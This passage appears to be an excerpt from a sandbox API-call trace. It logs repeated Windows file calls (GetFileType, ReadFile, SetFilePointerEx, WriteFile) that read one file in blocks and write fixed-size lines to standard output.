[0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] WriteFile (in: hFile=0x50, 
lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.223] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.223] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] GetFileType (hFile=0x50) returned 0x1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] GetFileType (hFile=0x50) returned 0x1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] GetFileType (hFile=0x50) returned 0x1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 
[0236.224] GetFileType (hFile=0x50) returned 0x1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] GetFileType (hFile=0x50) returned 0x1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.225] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.225] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, 
lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: 
lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.226] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.226] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.227] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.227] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] 
GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 
[0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.228] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.228] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.229] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.230] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType 
(hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.230] GetFileType (hFile=0x50) returned 0x1 [0236.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.231] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.231] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.231] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType (hFile=0x50) returned 0x1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.231] GetFileType 